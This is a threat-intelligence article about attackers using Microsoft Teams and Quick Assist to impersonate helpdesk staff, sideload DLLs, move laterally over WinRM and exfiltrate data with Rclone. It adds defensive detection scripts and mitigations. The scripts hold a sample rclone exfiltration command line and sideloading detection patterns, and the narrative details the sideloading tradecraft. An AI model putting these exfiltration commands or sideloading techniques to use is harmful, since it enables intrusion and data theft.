Threat actors are abusing Microsoft Teams’ external collaboration features to impersonate IT helpdesk personnel, manipulate users into granting remote access, and execute a full-chain intrusion from initial social engineering to credential-backed lateral movement and cloud-based data exfiltration.
Microsoft’s Security Blog published detailed technical findings on April 17, 2026, confirming that threat actors are actively initiating cross-tenant Microsoft Teams communications while masquerading as internal support staff to socially engineer employees into providing remote desktop access.
This campaign represents one of the most operationally stealthy enterprise attack chains documented to date, leveraging entirely legitimate tools and protocols to blend into routine IT support activity throughout every phase of the intrusion.
Teams as a Phishing Vector
The intrusion chain starts with a deceptively simple tactic. Attackers operating from a separately controlled Microsoft tenant initiate a Teams chat with targeted employees, impersonating IT support or helpdesk personnel.
Because the contact arrives through a trusted enterprise collaboration platform rather than traditional email, it bypasses the natural skepticism employees associate with unsolicited phishing emails.
Microsoft Teams does display external sender warnings, including Accept/Block screens, first-contact notices, and spam phishing alerts, but this attack relies on convincing users to ignore those warnings entirely.
Voice phishing (vishing) is frequently layered on top of the Teams messages to add urgency and authenticity. Common lures observed include “Microsoft Security Update,” “Account Verification,” and “Spam Filter Update” pretexts designed to manufacture a false emergency and pressure users into action.
Notably, attackers exploit a relatively new default-enabled Microsoft feature described in update MC1182004, which allows any Teams user to initiate a chat with any email address, instantly forming a cross-tenant connection when the recipient accepts. Once that connection is established, the social engineering process begins in earnest.
Remote Access Foothold
With social engineering complete, the attacker instructs the victim to open Quick Assist, enter a supplied security code, and approve all elevation prompts. This step is often completed in under sixty seconds. From the attacker’s perspective, approval of the Quick Assist session delivers full interactive control of the endpoint.
This tactic has previously been linked to threat actors, including Storm-1811, a financially motivated group tracked by Microsoft since mid-2024 for systematically targeting enterprise environments through Quick Assist abuse.
More recently, the Black Basta and Cactus ransomware groups have adopted identical techniques, amassing over $107 million in Bitcoin ransom payments since October 2024 through Teams-plus-Quick Assist intrusion chains.
Once interactive control is achieved, attackers typically spend 30–120 seconds performing rapid reconnaissance, executing commands via cmd.exe and PowerShell to verify user privileges, confirm domain affiliation, gather system information, and assess network reachability.
DLL Sideloading and Payload Execution
After reconnaissance, the intrusion transitions into persistent execution. Attackers stage a small payload bundle in directories such as C:\ProgramData\Adobe\ARM\ and C:\ProgramData\Microsoft\DeviceSync\, then launch legitimate, vendor-signed executables that sideload attacker-supplied malicious DLLs placed beside them. Observed examples include:
- AcroServicesUpdater2_x64.exe loading a staged msi.dll
- ADNotificationManager.exe loading vcruntime140_1.dll
- DlpUserAgent.exe loading mpclient.dll
This DLL sideloading technique allows attacker-controlled code to execute under a trusted application’s context, effectively masking malicious behavior from endpoint detection tools.
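The detection angle that follows from this is an image-load check: a DLL with a name Windows normally resolves from System32 or a vendor install directory, loaded instead from a user-writable path next to its host executable. The script below is an added example, not code from the article or from Microsoft; the image-load events are constructed sample data, and the trusted-directory regex is a simplifying assumption (it treats everything outside Windows and Program Files as user-writable). It generalizes slightly beyond the three pairs above by also reporting any same-directory load from a user-writable path.

```python
import ntpath
import re

# Constructed sample image-load events, not real telemetry:
# (loading process path, loaded DLL path). The first three mirror the
# executable/DLL pairs described above; the last two are benign loads.
SAMPLE_IMAGE_LOADS = [
    (r"C:\ProgramData\Adobe\ARM\AcroServicesUpdater2_x64.exe",
     r"C:\ProgramData\Adobe\ARM\msi.dll"),
    (r"C:\ProgramData\Microsoft\DeviceSync\ADNotificationManager.exe",
     r"C:\ProgramData\Microsoft\DeviceSync\vcruntime140_1.dll"),
    (r"C:\ProgramData\Microsoft\DeviceSync\DlpUserAgent.exe",
     r"C:\ProgramData\Microsoft\DeviceSync\mpclient.dll"),
    (r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\msi.dll"),
    (r"C:\Program Files\Vendor\app.exe",
     r"C:\Program Files\Vendor\vcruntime140_1.dll"),
]

# Assumption: only Windows and Program Files need admin rights to write to;
# everything else (ProgramData, AppData, profiles, temp) is user-writable.
TRUSTED_DIR_RE = re.compile(
    r"^[A-Za-z]:\\(Windows|Program Files( \(x86\))?)\\", re.IGNORECASE)

# DLL names Windows normally resolves from System32 or a vendor install
# directory; the article names these three as abused in this campaign.
WATCHED_DLLS = {"msi.dll", "vcruntime140_1.dll", "mpclient.dll"}


def is_user_writable(path: str) -> bool:
    return TRUSTED_DIR_RE.match(path) is None


def find_sideload_candidates(events):
    """Return (exe name, dll name, reason) for loads that fit sideloading:
    a DLL loaded from a user-writable directory, either a known abused name
    (higher confidence) or any DLL living beside the process that loaded it."""
    hits = []
    for proc, dll in events:
        if not is_user_writable(dll):
            continue
        dll_name = ntpath.basename(dll).lower()
        same_dir = ntpath.dirname(proc).lower() == ntpath.dirname(dll).lower()
        if dll_name in WATCHED_DLLS:
            reason = "known-sideload-target"
        elif same_dir:
            reason = "same-dir-load-from-user-writable-path"
        else:
            continue
        hits.append((ntpath.basename(proc), dll_name, reason))
    return hits
```

In production the same logic maps onto image-load telemetry (for example Defender for Endpoint's DeviceImageLoadEvents) with the process's signer status as an extra field.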
An encrypted configuration value is then written to a user-context registry key, enabling a fileless in-memory loader consistent with the Havoc command-and-control framework to reconstruct execution context and C2 configuration without writing additional files to disk.
Lateral Movement via WinRM and Domain Controller Targeting
Command-and-control is established via outbound HTTPS (TCP/443) connections from the sideloaded process to dynamically hosted cloud-backed attacker infrastructure, deliberately mimicking legitimate application update traffic. From this externally directed foothold, the attacker pivots internally.
Using Windows Remote Management (WinRM) over TCP port 5985, the threat actor moves laterally from the initially compromised endpoint toward high-value domain infrastructure, including Active Directory domain controllers.
This credential-backed lateral movement uses native administrative protocols, making it extraordinarily difficult to distinguish from authorized administrative activity without behavioral telemetry correlation across identity, endpoint, and collaboration signals.
Following lateral movement, attackers remotely install additional commercial remote management software via msiexec.exe, establishing a redundant control channel independent of the original implant, ensuring persistence even if early-stage payloads are discovered and removed.
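The correlation the text calls for (a Quick Assist session on an endpoint followed by WinRM traffic from that endpoint to a domain controller) can be expressed as a small stateful rule over a time-ordered event stream. The code below is an added example, not Microsoft's or the article's detection logic; the events, hostnames, the domain-controller inventory and the management-host allowlist are constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry), already sorted by time.
# kind "process" = process creation, kind "netconn" = outbound connection.
EVENTS = [
    {"ts": "2026-04-17T09:02:10", "host": "WS-114", "user": "jdoe",
     "kind": "process", "image": "QuickAssist.exe"},
    {"ts": "2026-04-17T09:03:05", "host": "WS-114", "user": "jdoe",
     "kind": "process", "image": "cmd.exe"},
    {"ts": "2026-04-17T09:41:30", "host": "WS-114", "user": "jdoe",
     "kind": "netconn", "dst": "DC01", "port": 5985},
    {"ts": "2026-04-17T11:15:00", "host": "ADMIN-02", "user": "it-ops",
     "kind": "netconn", "dst": "DC01", "port": 5985},
]

WINRM_PORTS = {5985, 5986}          # WinRM over HTTP / HTTPS
DOMAIN_CONTROLLERS = {"DC01"}       # assumption: DC hostnames from inventory
MANAGEMENT_HOSTS = {"ADMIN-02"}     # assumption: allowlisted admin workstations
WINDOW = timedelta(hours=2)         # how long a Quick Assist session "taints" a host


def correlate(events, window=WINDOW):
    """Flag WinRM connections to a DC from a non-management host that ran
    Quick Assist within `window` beforehand. Returns a list of alert dicts."""
    last_quick_assist = {}  # host -> (timestamp, user who launched it)
    alerts = []
    for e in events:
        ts = datetime.fromisoformat(e["ts"])
        if e["kind"] == "process" and e["image"].lower() == "quickassist.exe":
            last_quick_assist[e["host"]] = (ts, e["user"])
            continue
        if e["kind"] != "netconn" or e["port"] not in WINRM_PORTS:
            continue
        if e["dst"] not in DOMAIN_CONTROLLERS or e["host"] in MANAGEMENT_HOSTS:
            continue
        qa = last_quick_assist.get(e["host"])
        if qa is None or ts - qa[0] > window:
            continue
        alerts.append({
            "host": e["host"], "user": e["user"], "dst": e["dst"],
            "minutes_after_quick_assist": int((ts - qa[0]).total_seconds() // 60),
        })
    return alerts
```

The allowlist is what keeps routine WinRM from admin workstations quiet; the Quick Assist precondition is what separates this from a generic "workstation talks to DC on 5985" rule.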
Data Exfiltration via Rclone to External Cloud Storage
In the final observed stage, threat actors use Rclone, a widely available open-source file synchronization utility, to systematically transfer business-relevant documents from internal network shares to external cloud storage.
File-type exclusions within the Rclone transfer parameters indicate a deliberately targeted exfiltration effort designed to maximize the value of stolen data while minimizing transfer size and detection probability.
Microsoft Defender for Endpoint may flag this activity as possible data exfiltration involving uncommon synchronization tooling, though the use of legitimate utilities continues to challenge traditional signature-based detection approaches.
Mitigation
Organizations should implement layered defenses to disrupt this intrusion chain at multiple stages:
- Review cross-tenant Teams collaboration policies and restrict external messaging to verified, allowlisted organizations where business necessity does not require open external chat.
- Disable or restrict Quick Assist to authorized IT roles only, and educate users never to approve remote access sessions from unsolicited contacts.
- Enable Attack Surface Reduction (ASR) rules in block mode, and deploy Windows Defender Application Control (WDAC) policies to prevent DLL sideloading from user-writable directories such as ProgramData and AppData.
- Enforce Conditional Access policies requiring MFA and compliant device verification for all administrative roles, and restrict WinRM to designated management workstations.
- Enable Safe Links for Teams conversations and ensure Zero-hour Auto Purge (ZAP) is active to quarantine flagged messages retroactively.
- Establish verbal helpdesk authentication codes, internal phrases that an attacker impersonating IT support is unlikely to know, and train staff to verify external sender indicators before accepting any remote assistance session.
- Deploy Microsoft Defender’s Automatic Attack Disruption capability, which can suspend originating user sessions and contain compromised accounts before domain controller interaction when credential-backed WinRM lateral movement is detected following a Quick Assist session.
Microsoft Defender XDR provides correlated visibility across identity, endpoint, and collaboration telemetry, surfacing the entire attack chain as a single, unified, multi-stage incident rather than dozens of disconnected alerts, enabling security operations teams to detect and disrupt the intrusion before it escalates into enterprise-wide compromise.
FAQ
Q1: How do attackers initiate contact through Microsoft Teams without being detected?
Attackers create or control external Microsoft tenants, set display names to impersonate IT helpdesk staff, and initiate chats that exploit Teams’ cross-tenant collaboration feature, banking on users ignoring warnings about external senders and Accept/Block prompts.
Q2: Why is Quick Assist particularly dangerous in this attack chain?
Quick Assist is a legitimate, Microsoft-signed remote support tool built into Windows, making its execution appear non-suspicious; once a user approves a session, attackers gain full interactive control of the endpoint within seconds, bypassing most endpoint security controls.
Q3: What makes DLL sideloading through trusted applications so difficult to detect?
Because a legitimate, vendor-signed executable loads the malicious DLL, the malicious code inherits the trusted application’s execution context, effectively evading security tools that rely on process reputation and file signing to distinguish benign from malicious activity.
Q4: How can organizations detect Rclone-based data exfiltration before data leaves the network?
Security teams should hunt for rclone.exe process execution with transfer flags such as --transfers 16, --config rclone_uploader.conf, and --exclude *.mdf, and configure Microsoft Defender XDR custom detections to alert on synchronization utilities connecting to external cloud storage from non-standard processes.
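To turn that hunting guidance into something repeatable, the command line has to be parsed rather than string-matched, because the flags the article lists can appear in any order and the source/destination are positional. The following is an added example, not the article's or Microsoft's detection content; the sample command lines are constructed, and the "remote" heuristic (a colon anywhere but the drive-letter position) is an assumption about rclone's name:path syntax.

```python
import ntpath
import shlex

# Constructed sample process-creation command lines (not real telemetry).
# The first mirrors the flags listed above; the others are for contrast.
SAMPLE_CMDLINES = [
    r'"C:\ProgramData\rclone\rclone.exe" copy \\FS01\Finance up:staging '
    r'--transfers 16 --config rclone_uploader.conf --exclude *.mdf --exclude *.iso',
    r'"C:\Tools\rclone.exe" sync D:\photos gdrive:photos',
    r'C:\Windows\System32\robocopy.exe \\FS01\Finance D:\archive /E',
]


def is_rclone_remote(token: str) -> bool:
    # Assumption: rclone remotes look like name:path; a Windows drive has its
    # colon at index 1, so any other colon position is treated as a remote.
    return ":" in token and token.index(":") != 1


def analyze_cmdline(cmdline: str):
    """Return {"subcommand", "indicators"} for an rclone.exe command line,
    or None when the process is not rclone."""
    tokens = shlex.split(cmdline, posix=False)   # keep Windows backslashes
    if not tokens or ntpath.basename(tokens[0].strip('"')).lower() != "rclone.exe":
        return None
    indicators, positional, i = set(), [], 1
    while i < len(tokens):
        tok = tokens[i]
        if tok == "--config":
            indicators.add("custom_config")
        elif tok == "--exclude":
            indicators.add("file_type_exclusion")
        elif tok == "--transfers":
            if i + 1 < len(tokens) and tokens[i + 1].isdigit() and int(tokens[i + 1]) >= 8:
                indicators.add("high_parallelism")
        elif not tok.startswith("--"):
            positional.append(tok)      # subcommand, source, destination
        i += 2 if tok in ("--config", "--exclude", "--transfers") else 1
    if len(positional) >= 3:
        if positional[1].startswith("\\\\"):
            indicators.add("network_share_source")
        if is_rclone_remote(positional[2]):
            indicators.add("cloud_remote_destination")
    return {"subcommand": positional[0] if positional else None,
            "indicators": indicators}


def is_suspicious(cmdline: str, threshold: int = 3) -> bool:
    result = analyze_cmdline(cmdline)
    return result is not None and len(result["indicators"]) >= threshold
```

A renamed rclone binary defeats the file-name check, so in practice pair this with a file-hash or signer lookup on the image rather than relying on the name alone.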
Site: thecybrdef.com